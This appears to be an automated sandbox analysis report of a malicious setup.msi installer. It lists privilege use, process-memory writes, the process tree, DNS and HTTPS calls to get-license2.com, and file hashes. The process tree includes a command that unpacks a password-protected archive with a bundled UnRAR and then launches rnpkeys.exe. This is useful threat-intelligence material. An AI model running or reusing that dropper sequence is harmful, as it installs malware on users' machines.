Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 57B2DB4924C4A3BA1BAADC1717A4C9FC

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp

Files

C:\Windows\Installer\MSIB51C.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIB6D3.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSICF36.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\java.exe

MD5 81ef95c9d6fb0fd339f6b254c81f934b
SHA1 46b69c1ad6591a187e4a0fb505586b1dd7a0b4c6
SHA256 b8068815d4aa20f0f838fe081d7cb78379b5e82723f78cc1213232ed67226417
SHA512 818b3548af0b13f44f6807f6ff6ed268e4b8bd9ad92aeae6698cf623c094319a68cbb9f046918ea4f185e1ebb6bd015285c7f3b23e5620f877ea13db8b7ceaf1

C:\Config.Msi\f76b475.rbs

MD5 9a677dc8713521149e09d4dc6c616684
SHA1 ff83a783f01402da174dbe89c2597a7d45508c81
SHA256 c6f81c159d77a39a80af2b489d6da7c66015a68d8adea216d4d17debad1e7f1f
SHA512 f27f4840649ea1da66d0a958b03f34774406ac873be49bbffa895cb884bdc4eef2d9696b2a141e1d0b7dd12a6df21e79c572b73136b869af440255d8d380775a

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Windows\Installer\f76b471.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145